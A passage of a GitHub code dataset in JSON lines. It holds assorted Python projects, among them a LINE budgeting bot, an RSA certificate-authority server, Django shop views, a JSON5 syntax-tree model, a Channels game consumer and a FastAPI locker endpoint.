reached\n\ndef has_passed_enough_time(ref_time, curr_time, threshold):\n return ref_time - curr_time > threshold\n\n# TODO\ndef is_gap_reachable(vehicle, traffic_vehicles, gap_size):\n return False\n\n# TODO\ndef was_the_gap_reached(vehicle, traffic_vehicles, gap_size):\n return False\n","repo_name":"rodrigoqueiroz/geoscenarioserver","sub_path":"sv/ManeuverUtils.py","file_name":"ManeuverUtils.py","file_ext":"py","file_size_in_byte":13044,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"30101454100","text":"import re\nimport os\nimport zaim\nfrom datetime import datetime, date,timedelta\nimport logging\n\nfrom flask import Flask, request, abort\n\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\n\n\napplication = Flask(__name__)\nlogging.basicConfig()\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\n\nline_bot_api = LineBotApi(os.environ['LineBotApi'])\nhandler = WebhookHandler(os.environ['WebHook'])\n\n@application.route('/', methods=['GET', 'POST'])\ndef lambda_handler(event=None, context=None):\n logger.info('Lambda function invoked index()')\n return 'hello from Flask!'\n\n@application.route(\"/bot/callback\", methods=['POST'])\n\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n application.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n return 'OK'\n\n\n\n@handler.add(MessageEvent, message=TextMessage)\n\n\n# def handle_message(event):\n# line_bot_api.reply_message(\n# event.reply_token,\n# TextSendMessage(text=event.message.text))\n\n\n#追加\n\ndef text_message_handler(event):\n\n VALUE = (yesterday_sum() - today_sum())\n\n\n if re.match('.*残高.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('残っていないよ'))\n elif re.match('.*差額.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('先月との差額は'+str(VALUE)+'円だよ'))\n elif re.match('.*今日.*いくら.*',event.message.text):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('5000円使ったよ'))\n elif re.match('gitub',event.message.text,re.IGNORECASE):\n line_bot_api.reply_message(event.reply_token, TextSendMessage('https://github.com/jphacks/ON_1801'))\n else:\n line_bot_api.reply_message(event.reply_token, TextSendMessage('ちゃんと話して!'))\n\n\n#zaimに問い合わせ\n\ndef request_zaim_setup():\n zapi = zaim.Api(consumer_key=os.environ['ZAIM_KEY'],\n consumer_secret=os.environ['ZAIM_SECRET'],\n access_token=os.environ['ACCESS_TOKEN_ZAIM'],\n access_token_secret=os.environ['ACCESS_TOKEN_ZAIM_SECRET'])\n return zapi\n\n\ndef request_zaim_money_day(zapi, calc_days=0):\n d_day = datetime.today()\n if calc_days != 0:\n if calc_days < 0:\n calc_days *= -1\n d_day = d_day - timedelta(days=calc_days)\n print(d_day.strftime('%Y-%m-%d'))\n day_moneys_json = zapi.money(mapping=1,\n start_date=d_day.strftime('%Y-%m-%d'),\n mode='payment',\n end_date=d_day.strftime('%Y-%m-%d')\n )\n return day_moneys_json\n\n\ndef today_sum():\n return calc_money_sum(request_zaim_money_day(request_zaim_setup()))\n\n\ndef calc_money_sum(moneys):\n summoney = 0\n for money in moneys['money']:\n summoney += money['amount']\n return summoney\n\n\ndef yesterday_sum():\n return calc_money_sum(request_zaim_money_day(request_zaim_setup(), -1))\n\n\nif __name__ == \"__main__\":\n application.run()\n","repo_name":"jphacks/ON_1801","sub_path":"linebot/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"36780861414","text":"# DEPENDENCIES\nimport time\nimport random\nimport json\nimport rsa\nimport datetime\n# PACKAGE CA\nfrom Venus.Crypto.crypto import *\nfrom Venus.TCP.callisto import *\n# Requisição da chave pública de algum nó do cliente para o CA:\n# Resposta do CA para requisições de chave pública:\n# Requisição da Autenticação do cliente para o servidor:\n# Resposta da autenticação do cliente\n# Requisição da operação do cliente\n# Resposta da operação do cliente\n\n\nclass vCA():\n\n def __init__(self):\n self.__CAKEY = \"Venus/CA/data/CAKey.txt\"\n self.__CA_DATABASE = \"Venus/CA/data/database.txt\"\n f = open(self.__CAKEY, \"r\")\n keys = json.loads(f.read())\n f.close()\n self.__publicKey = rsa.PublicKey(\n keys[\"privKey\"][\"n\"], keys[\"privKey\"][\"e\"])\n self.__privateKey = rsa.PrivateKey(\n keys[\"privKey\"][\"n\"], keys[\"privKey\"][\"e\"], keys[\"privKey\"][\"d\"], keys[\"privKey\"][\"p\"], keys[\"privKey\"][\"q\"])\n f = open(self.__CA_DATABASE, \"r\")\n self.__database = json.loads(f.read())\n f.close()\n self.__CAaddr = (keys[\"addr\"][\"ip\"], keys[\"addr\"][\"port\"])\n print(\"CA online\")\n\n def __register(self, addr, n, e):\n\n user = str(addr[0]) + \"::\" + str(addr[1])\n self.__database[user] = {}\n self.__database[user][\"n\"] = n\n self.__database[user][\"e\"] = e\n pkt = {}\n pkt[\"code\"] = \"900\"\n return pkt\n\n def __getKey(self, addr):\n user = str(addr[0]) + \"::\" + str(addr[1])\n\n if user not in self.__database.keys():\n return None\n\n pubKey = rsa.PublicKey(\n self.__database[user][\"n\"], self.__database[user][\"e\"])\n return pubKey\n\n def __handleResponse(self, packet):\n\n packet = decrypt(packet, self.__privateKey)\n msg = json.loads(packet.decode(\"utf-8\"))\n\n if msg[\"code\"] == \"000\":\n addr = msg[\"addr\"]\n msg = self.__register(addr, msg[\"n\"], msg[\"e\"])\n pubKey = self.__getKey(addr)\n\n elif msg[\"code\"] == \"001\":\n addr = msg[\"addr\"]\n pubKey = rsa.PublicKey(msg[\"n\"], msg[\"e\"])\n ret = self.__getKey(addr)\n\n if ret == None:\n msg = {}\n msg[\"code\"] = \"901\"\n else:\n msg = {}\n msg[\"code\"] = \"900\"\n msg[\"addr\"] = addr\n msg[\"n\"] = ret.n\n msg[\"e\"] = ret.e\n else:\n msg = {}\n msg[\"code\"] = \"901\"\n\n pkt = json.dumps(msg).encode(\"utf-8\")\n pkt = encrypt(pkt, pubKey)\n return pkt\n\n def __close(self):\n f = open(self.__CA_DATABASE, \"w\")\n txt = json.dumps(self.__database)\n f.write(txt)\n f.close()\n\n def listen(self, lifetime=None):\n channel = callistoServer(\n self.__handleResponse, self.__CAaddr, lifetime=lifetime)\n print(\"Servidor ouvindo em \", str(self.__CAaddr))\n channel.start()\n self.__close()\n print(\"closed\")\n","repo_name":"kinhosz/Venus","sub_path":"src/Venus/CA/ca.py","file_name":"ca.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"17228246659","text":"from django.shortcuts import render\nfrom seller.models import Item,ItemPicture,shop\nfrom .models import PageView,CartItem,Shipping\n\n#import requests\n#import xmltodict\nimport json\n#from authentication.models import Profile\nimport datetime\nimport os\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse, HttpResponseRedirect,HttpResponse\nimport json\n\n# Create your views here.\ndef sort_item(queryset):\n results = {}\n for i in queryset:\n try:\n results[i.item_id] = results[i.item_id] + 1\n except KeyError:\n results[i.item_id] = 1\n return results\ndef index(request):\n if request.GET.get(\"q\") is not None:\n query = request.GET.get(\"q\")\n results = []\n items = Item.objects.filter(name__contains=query) | \\\n Item.objects.filter(discription__contains=query) | \\\n Item.objects.filter(item_id__contains=query)\n\n for i in items:\n item_pic = ItemPicture.objects.filter(item_id=i.item_id)[0]\n results.append([item_pic, i])\n\n return render(request, \"shopper/search.html\", {\n \"items\": results,\n \"q\": query\n })\n \n else:\n current_hour = datetime.datetime.now().hour\n #slogo=shop()\n \n\n try:\n PageView.objects.filter(timestamp__hour=str(current_hour-1)).delete()\n except Exception as e:\n print(e)\n PageView.objects.filter(timestamp__hour=str(current_hour)).delete()\n\n popular_items = []\n result = sort_item(PageView.objects.filter())\n print(result)\n for i in result:\n item = Item.objects.get(item_id=i)\n pic = ItemPicture.objects.filter(item_id=item.item_id)[0]\n popular_items.append([item, result[i], pic])\n\n return render(request, \"shopper/index.html\", {\n \"popular\": popular_items,\n\n #\"shops\": slogo\n \n }) \n\ndef view_item(request,item_id):\n \n item = Item.objects.get(item_id=item_id)\n images = ItemPicture.objects.filter(item_id=item_id)\n \n PageView(item_id=item_id).save()\n print(images[1:])\n\n return render(request, \"shopper/viewitem.html\", {\n \n \"item\": item,\n #\"image0\": images[0],\n \"imgs0\": images[0],\n \"imgs\": images[1:]\n }) \n@csrf_exempt\ndef add_cart(request):\n\n post_data = json.loads(request.body.decode(\"utf-8\"))\n # https://stackoverflow.com/questions/61543829/django-taking-values-from-post-request-javascript-fetch-api\n\n item_id = post_data[\"item_id\"]\n quantity = post_data[\"quantity\"]\n user_id = request.user.id\n\n CartItem(item_id=item_id, user_id=user_id, quantity=quantity).save()\n\n return JsonResponse({\"code\": 200})\n\n\ndef cart(request):\n data = []\n items = CartItem.objects.filter(user_id=request.user.id)\n price = 0\n\n for i in items:\n item = Item.objects.get(item_id=i.item_id)\n pic = ItemPicture.objects.filter(item_id=i.item_id)[0]\n data.append([item, i, pic])\n print(i.quantity)\n price = (item.price * i.quantity)\n\n return render(request, \"shopper/cart.html\", {\n \"data\": data,\n \"price\": '%.2f' % round(price, 2)\n })\n\n@csrf_exempt\ndef delete_cart(request):\n\n post_data = json.loads(request.body.decode(\"utf-8\"))\n # https://stackoverflow.com/questions/61543829/django-taking-values-from-post-request-javascript-fetch-api\n\n item_id = post_data[\"item_id\"]\n user_id = request.user.id\n\n CartItem.objects.get(item_id=item_id, user_id=user_id).delete()\n\n return JsonResponse({\"code\": 200})\n@csrf_exempt\ndef modify_cart(request):\n\n post_data = json.loads(request.body.decode(\"utf-8\"))\n item_id = post_data[\"item_id\"]\n user_id = request.user.id\n quantity = post_data[\"quantity\"]\n\n c = CartItem.objects.get(user_id=user_id, item_id=item_id)\n c.quantity = quantity\n c.save()\n\n return JsonResponse({\"code\": 200})\n\ndef checkout(request):\n if request.method == \"POST\":\n sfname = request.POST[\"sname\"]\n slname =request.POST[\"slname\"]\n smail =request.POST[\"mid\"]\n sphone =request.POST[\"ph\"]\n address = request.POST[\"adrs\"]\n state = request.POST[\"state\"]\n city =request.POST[\"city\"]\n zip = request.POST[\"zip\"]\n items = CartItem.objects.filter(user_id=request.user.id)\n \n for i in items:\n item = Item.objects.get(item_id=i.item_id)\n quantity = i.quantity\n print(item.item_id,\"itemmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm\")\n print(item.shop_id,\"shopppppppppppppppppppppppppppppppppppppppppppppppppppppppp\")\n print(i.item_id,\"iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\") \n s=Shipping()\n s.firstname=sfname\n s.lastname=slname\n s.email=smail\n s.mobile=sphone\n \n s.address=address\n s.state=state\n s.city=city\n s.pincode=zip\n s.shop_id=item.shop_id\n s.item_id=i.item_id\n s.quantity=quantity\n s.save()\n \n \n \n\n \n \n \n \n return HttpResponse(\"order placed successfully seller will contact you shortly\")\n print(item.item_id)\n print(quantity) \n else:\n return render(request,\"shopper/checkout.html\") \n","repo_name":"AmalprashobM/Django-project","sub_path":"shopper/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73172269976","text":"#!/usr/bin/env pypy3\n\ndef fprint(*args):\n\tprint(*args, flush=True)\n\n### CODE HERE\n\n\nfrom itertools import chain, combinations\n\ndef ss(B):\n\n\tif not sum(B) % 2 == 0: return False\n\ttarget = sum(B) // 2\n\n\timport array\n\tpossible = array.array('b', [1] + [0]*target)\n\n\tfor b in B:\n\t\tnext_possible = array.array('b', possible)\n\t\tfor i in range(len(possible)):\n\t\t\tif possible[i] != 1: continue\n\t\t\tif i + b > target: continue\n\t\t\tif target == i + b:\n\t\t\t\treturn True\n\t\t\tif i + b < target:\n\t\t\t\tnext_possible[i+b] = 1\n\t\tpossible = next_possible\n\n\treturn False\n\ndef subsets(iterable, low=0, high=None):\n \"subsets([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)\"\n s = list(iterable)\n if high is None:\n high = len(s)\n return chain.from_iterable(combinations(s, r) for r in range(low, high+1))\n\ndef get_ss(B):\n\tfor ss in subsets(B):\n\t\tif sum(ss) == sum(B)//2: return ss\n\treturn False\n\ndef ok(B):\n\tif len(B) <= 1: return False\n\tif sum(B) % 2 != 0: return False\n\tif ss(B):\n\t\tassert(get_ss(B))\n\t\treturn True\n\treturn False\n\ndef tries(N):\n\timport random\n\tB = []\n\tlow = 1\n\twhile True:\n\t\tif ok(B):\n\t\t\treturn B\n\t\tB += [random.randrange(low, low+N)]\n\t\tlow += N\n\nN = int(input())\n\ndef query(arr):\n arr = [\"?\"] + list(map(str,arr))\n fprint(*arr)\n return int(input())\n\nB = []\nlow = 1\nwhile True:\n if ok(B):\n break\n B += [query(range(low, low+N))]\n low += N\n\nB1 = get_ss(B)\nB2 = []\nfor b in B:\n if b not in B1:\n B2 += [b]\n\nfprint(f\"! {len(B1)} {len(B2)}\")\nfprint(*B1)\nfprint(*B2)\n","repo_name":"ldct/cp","sub_path":"OI/EGOI/2021/C/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"29994884366","text":"def solution(prices):\n from collections import deque\n prices = deque(prices)\n answer = []\n \n while prices:\n i=0\n cur = prices.popleft()\n if not prices:\n answer.append(0)\n break\n else:\n for p in prices:\n i+=1\n if p typing.Generator[Node, None, None]:\n todo = deque([root])\n while todo:\n node: Node = todo.popleft()\n todo.extend(iter_child_nodes(node))\n yield node\n\n\ndef iter_child_nodes(node: Node) -> typing.Generator[Node, None, None]:\n for attr, value in iter_fields(node):\n if isinstance(value, Node):\n yield value\n elif isinstance(value, list):\n for item in value:\n if isinstance(item, Node):\n yield item\n\n\ndef iter_fields(node: Node) -> typing.Generator[tuple[str, Any], None, None]:\n for field_name in node._fields:\n try:\n value = getattr(node, field_name)\n yield field_name, value\n except AttributeError:\n pass\n\n\nclass Node:\n excluded_names = ['excluded_names', 'wsc_before', 'wsc_after', 'leading_wsc', 'tok', 'end_tok']\n\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n # Whitespace/Comments before/after the node\n self.wsc_before: list[str | Comment] = []\n self.wsc_after: list[str | Comment] = []\n self._tok: JSON5Token | None = tok\n self._end_tok: JSON5Token | None = end_tok\n\n @property\n def col_offset(self) -> int | None:\n if self._tok is None:\n return None\n return self._tok.colno\n\n @property\n def end_col_offset(self) -> int | None:\n if self._end_tok is None:\n return None\n return self._end_tok.end_colno\n\n @property\n def lineno(self) -> int | None:\n if self._tok is None:\n return None\n return self._tok.lineno\n\n @property\n def end_lineno(self) -> int | None:\n if self._end_tok is None:\n return None\n r = self._end_tok.end_lineno\n return r\n\n def __repr__(self) -> str:\n rep = (\n f\"{self.__class__.__name__}(\"\n + \", \".join(\n f\"{key}={repr(value)}\"\n for key, value in self.__dict__.items()\n if not key.startswith('_') and key not in self.excluded_names\n )\n + \")\"\n )\n return rep\n\n @property\n def _fields(self) -> list[str]:\n fields = [item for item in list(self.__dict__) if not item.startswith('_') and item not in self.excluded_names]\n fields.extend(['wsc_before', 'wsc_after'])\n return fields\n\n\nclass JSONText(Node):\n def __init__(self, value: Value, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert isinstance(value, Value)\n self.value: Value = value\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass Value(Node):\n pass\n\n\nclass Key(Node):\n ...\n\n\nclass JSONObject(Value):\n def __init__(\n self,\n *key_value_pairs: KeyValuePair,\n trailing_comma: TrailingComma | None = None,\n leading_wsc: list[str | Comment] | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n keys: list[Key] = []\n values: list[Value] = []\n for key, value in key_value_pairs:\n assert isinstance(key, Key)\n assert isinstance(value, Value)\n keys.append(key)\n values.append(value)\n assert len(keys) == len(values)\n self.keys: list[Key] = keys\n self.values: list[Value] = values\n assert leading_wsc is None or all(isinstance(item, str) or isinstance(item, Comment) for item in leading_wsc)\n self.trailing_comma: TrailingComma | None = trailing_comma\n self.leading_wsc: list[str | Comment] = leading_wsc or []\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n @property\n def key_value_pairs(self) -> list[KeyValuePair]:\n return list(KeyValuePair(key, value) for key, value in zip(self.keys, self.values))\n\n\nclass JSONArray(Value):\n def __init__(\n self,\n *values: Value,\n trailing_comma: TrailingComma | None = None,\n leading_wsc: list[str | Comment] | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n vals = list(values)\n for value in vals:\n assert isinstance(value, Value), f\"Was expecting object with type Value. Got {type(value)}\"\n assert leading_wsc is None or all(isinstance(item, str) or isinstance(item, Comment) for item in leading_wsc)\n self.values: list[Value] = vals\n self.trailing_comma: TrailingComma | None = trailing_comma\n self.leading_wsc: list[str | Comment] = leading_wsc or []\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n\nclass Identifier(Key):\n def __init__(\n self, name: str, raw_value: str | None = None, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert isinstance(name, str)\n if raw_value is None:\n raw_value = name\n assert isinstance(raw_value, str)\n assert len(name) > 0\n self.name: str = name\n self.raw_value: str = raw_value\n\n super().__init__(tok=tok, end_tok=tok)\n\n def __hash__(self) -> int:\n return hash(self.name)\n\n def __eq__(self, other: Any) -> bool:\n return hash(self) == hash(other)\n\n\nclass Number(Value):\n ...\n\n\nclass Integer(Number):\n def __init__(\n self,\n raw_value: str,\n is_hex: bool = False,\n is_octal: bool = False,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n assert isinstance(raw_value, str)\n if is_hex and is_octal:\n raise ValueError(\"is_hex and is_octal are mutually exclusive\")\n if is_hex:\n value = int(raw_value, 0)\n elif is_octal:\n if raw_value.startswith('0o'):\n value = int(raw_value, 8)\n else:\n value = int(raw_value.replace('0', '0o', 1), 8)\n else:\n value = int(raw_value)\n self.value: int = value\n self.raw_value: str = raw_value\n self.is_hex: bool = is_hex\n self.is_octal: bool = is_octal\n\n super().__init__(tok=tok, end_tok=end_tok or tok)\n\n\nclass Float(Number):\n def __init__(\n self,\n raw_value: str,\n exp_notation: str | None = None,\n tok: JSON5Token | None = None,\n end_tok: JSON5Token | None = None,\n ):\n value = float(raw_value)\n assert exp_notation is None or exp_notation in ('e', 'E')\n self.raw_value: str = raw_value\n self.exp_notation: str | None = exp_notation\n\n self.value: float = value\n super().__init__(tok=tok, end_tok=end_tok or tok)\n\n\nclass Infinity(Number):\n def __init__(self, negative: bool = False, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n self.negative: bool = negative\n\n super().__init__(tok=tok, end_tok=tok)\n\n @property\n def value(self) -> float:\n return math.inf if not self.negative else -math.inf\n\n @property\n def const(self) -> Literal['Infinity', '-Infinity']:\n if self.negative:\n return '-Infinity'\n else:\n return 'Infinity'\n\n\nclass NaN(Number):\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n super().__init__(tok=tok, end_tok=tok)\n\n @property\n def value(self) -> float:\n return math.nan\n\n @property\n def const(self) -> Literal['NaN']:\n return 'NaN'\n\n\nclass String(Value, Key):\n def __init__(\n self, characters: str, raw_value: str, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert isinstance(raw_value, str)\n assert isinstance(characters, str)\n self.characters: str = characters\n self.raw_value: str = raw_value\n\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass DoubleQuotedString(String):\n ...\n\n\nclass SingleQuotedString(String):\n ...\n\n\nclass BooleanLiteral(Value):\n def __init__(self, value: bool, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert value in (True, False)\n self.value: bool = value\n\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass NullLiteral(Value):\n value = None\n\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n super().__init__(tok=tok, end_tok=tok)\n\n\nclass UnaryOp(Value):\n def __init__(\n self, op: Literal['-', '+'], value: Number, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None\n ):\n assert op in ('-', '+')\n assert isinstance(value, Number)\n self.op: Literal['-', '+'] = op\n self.value: Number = value\n\n super().__init__(tok=tok, end_tok=end_tok)\n\n\nclass TrailingComma(Node):\n def __init__(self, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n super().__init__(tok=tok, end_tok=tok) # Trailing comma is always a single COMMA token\n\n\nclass Comment(Node):\n def __init__(self, value: str, tok: JSON5Token | None = None, end_tok: JSON5Token | None = None):\n assert isinstance(value, str), f\"Expected str got {type(value)}\"\n self.value: str = value\n super().__init__(tok=tok, end_tok=tok) # Comments are always a single token\n\n\nclass LineComment(Comment):\n ...\n\n\nclass BlockComment(Comment):\n ...\n","repo_name":"spyoungtech/json-five","sub_path":"json5/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10010,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} +{"seq_id":"29995016176","text":"def rotate(cur, flag):\n _next = []\n if flag == 0:\n _next = [cur[0],cur[1]-1]\n elif flag == 1:\n _next = [cur[0]-1,cur[1]]\n elif flag == 2:\n _next = [cur[0],cur[1]+1]\n elif flag == 3:\n _next = [cur[0]+1,cur[1]]\n \n if flag >= 3:\n flag = 0\n else:\n flag+=1\n \n \n return [_next, flag]\n\ndef choose_next(cur, flag):\n _next = []\n if flag == 0:\n _next = [cur[0],cur[1]+1]\n elif flag == 1:\n _next = [cur[0]+1,cur[1]]\n elif flag == 2:\n _next = [cur[0],cur[1]-1]\n elif flag == 3:\n _next = [cur[0]-1,cur[1]]\n\n return _next\n\ndef solution(rows, columns, queries):\n answer = []\n targets = []\n matrix = [[row * columns + col + 1 for col in range(columns)] for row in range(rows)]\n \n for querie in queries:\n targets.append([(querie[0], querie[1]), (querie[2], querie[3])])\n \n for target in targets:\n lt = [min(target[0][0], target[1][0])-1, min(target[0][1], target[1][1])-1]\n rt = [min(target[0][0], target[1][0])-1, max(target[0][1], target[1][1])-1]\n lb = [max(target[0][0], target[1][0])-1, min(target[0][1], target[1][1])-1]\n rb = [max(target[0][0], target[1][0])-1, max(target[0][1], target[1][1])-1]\n\n start = lt\n cur = lt\n tmp_min = float('inf')\n _next = []\n flag = 0\n last_num = matrix[cur[0]][cur[1]]\n\n while True:\n tmp_min = min(tmp_min, matrix[cur[0]][cur[1]])\n cur_num = matrix[cur[0]][cur[1]]\n matrix[cur[0]][cur[1]] = last_num\n last_num = cur_num\n _next = choose_next(cur, flag)\n\n if _next[0]lb[0] or _next[0]<0 or _next[0]>=rows or _next[1]rt[1] or _next[1]<0 or _next[1]>=columns:\n _next,flag = rotate(_next, flag)\n _next = choose_next(cur, flag)\n\n if _next == start:\n matrix[_next[0]][_next[1]] = last_num\n break\n cur = _next\n answer.append(tmp_min)\n \n return answer\n\nsolution(\t6, 6, [[2, 2, 5, 4], [3, 3, 6, 6], [5, 1, 6, 3]] )","repo_name":"DongjinS/algorithm_study","sub_path":"programmers/행렬테두리회전하기.py","file_name":"행렬테두리회전하기.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17346146673","text":"import json\n\nfrom asgiref.sync import sync_to_async\nfrom channels.db import database_sync_to_async\nfrom channels.generic.websocket import AsyncWebsocketConsumer\n\nfrom users.models import CustomUser\n\n\nclass GameRoomConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.gamename = self.scope['url_route']['kwargs']['gamename']\n self.game_group_name = f'game_{self.gamename}'\n await self.channel_layer.group_add(\n self.game_group_name,\n self.channel_name\n )\n await self.accept()\n\n async def receive(self, text_data=None, byte_data=None):\n text_data_json = json.loads(text_data)\n message = text_data_json['message']\n if message == 'ready':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'block_buttons',\n 'message': 'block',\n 'username': self.scope['user'].username,\n 'user_id': self.scope['user'].id\n }\n )\n elif message == 'unlock':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'unlock_buttons',\n 'message': 'unlocked'\n }\n )\n elif message == 'update':\n await self.channel_layer.group_send(\n self.game_group_name,\n {\n 'type': 'update_buttons',\n 'message': 'updated'\n }\n )\n\n async def block_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n 'username': event['username'],\n 'user_id': event['user_id']\n }))\n\n async def unlock_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n }))\n\n async def update_buttons(self, event):\n await self.send(text_data=json.dumps({\n 'message': event['message'],\n }))\n\n\n def get_name(self):\n return CustomUser.objects.all()[0].username\n\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.game_group_name,\n self.channel_name\n )\n\n","repo_name":"NoM0reParties/my_game","sub_path":"dj_app/quiz/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1420378203","text":"#!/usr/bin/env python\n# PYTHON_ARGCOMPLETE_OK\nimport interpreter\nimport inspect\nimport imp\nimport sys\nimport os\n\n\ndef k_runner():\n \"\"\"k command handler - searcher of the key.py file before handing over control to the CLI.\"\"\"\n # Check every directory from the current all the way to / for a file named key.py\n checkdirectory = os.getcwd()\n directories_checked = []\n keypy_filename = None\n while not os.path.ismount(checkdirectory):\n directories_checked.append(checkdirectory)\n if os.path.exists(\"{0}{1}key.py\".format(checkdirectory, os.sep)):\n keypy_filename = \"{0}{1}key.py\".format(checkdirectory, os.sep)\n break\n else:\n checkdirectory = os.path.abspath(os.path.join(checkdirectory, os.pardir))\n\n if not keypy_filename:\n sys.stderr.write(\"key.py not found in the following directories:\\n\\n\")\n sys.stderr.write('\\n'.join(directories_checked))\n sys.stderr.write(\"\\n\\nSee http://projectkey.readthedocs.org/en/latest/quickstart.html\\n\")\n sys.exit(1)\n else:\n interpreter.cli(imp.load_source(\"key\", keypy_filename))\n","repo_name":"crdoconnor/projectkey","sub_path":"projectkey/k_runner.py","file_name":"k_runner.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43931830931","text":"#!/usr/bin/env python\n\nfrom abnrlib.icm import ICManageCLI\nfrom altera_icm.abnr_utils import run_command\nimport json\n\nicm = ICManageCLI()\n\nfilename = '//depot/icm/proj/{}/{}/ipspec/dev/cell_names.txt'\ncmd = 'icmp4 print -q ' + filename\n\ndata = []\nprojects = ['i14socnd', 'Crete3', 'i10socfm']\nfor project in projects:\n for variant in icm.get_variants(project):\n exitcode, stdout, stderr = run_command(cmd.format(project, variant))\n cellnames = [line.strip() for line in stdout.splitlines() if not line.startswith('//') and not line.startswith(\"#\") and line.strip()]\n for cellname in cellnames:\n data.append( [project, variant, cellname] ) \n\nwith open('cellnames.json', 'w') as f:\n json.dump(data, f, indent=2)\n","repo_name":"lionelta/dmx_main_gdpxl_py23_cth","sub_path":"scripts/extract_all_cellnames_from_icm.py","file_name":"extract_all_cellnames_from_icm.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12007416257","text":"from fastapi import APIRouter, Body\nfrom typing import Union, Optional\nfrom pydantic import BaseModel\nfrom datetime import date, datetime\nfrom config.database import mongo_connection\n\nrouter = APIRouter(\n prefix=\"/lockers\",\n tags=[\"lockers\"],\n responses={404: {\"description\": \"Not found\"}},\n)\n\n# this endpont return list of lockers\n# 1. if locker is available, return id and status\n# 2. if locker is not available, return time left in minutes\n# 2.1 if time left is negative (User late to get package), return None\n# 2.2 if time left is positive (User still have time to get package), return time left in minutes\n@router.get(\"/\")\ndef lockers():\n data = list(mongo_connection[\"Locker\"].find({}, {\"_id\": False}))\n res = []\n\n def timeLeft(timeout):\n now = datetime.now()\n # if not late return known time\n if now > timeout:\n timeLeft = now - timeout\n return timeLeft.total_seconds() // 60\n # if late return None\n else:\n return None\n\n for record in data:\n if record[\"available\"] == True:\n res.append(record)\n else:\n tmp = {\n \"locker_id\": record[\"locker_id\"],\n \"available\": record[\"available\"],\n # # these data is not needed for frontend\n # \"timeIn\": record[\"timeIn\"],\n # \"timeout\": record[\"timeout\"],\n # \"userId\": record[\"userId\"],\n # \"package\": record[\"package\"],\n \"timeLeft\": timeLeft(record[\"timeout\"]),\n }\n res.append(tmp)\n return list(res)\n","repo_name":"katisd/Locker-exceed-backend","sub_path":"app/routers/get_locker_time.py","file_name":"get_locker_time.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73906160488","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nimport random\n\nfrom .constants import (NUM_BLACK_WORDS, NUM_BLUE_WORDS, NUM_RED_WORDS,\n NUM_WHITE_WORDS, NUM_WORDS)\nfrom ..models import TeamWord\n\n\ndef 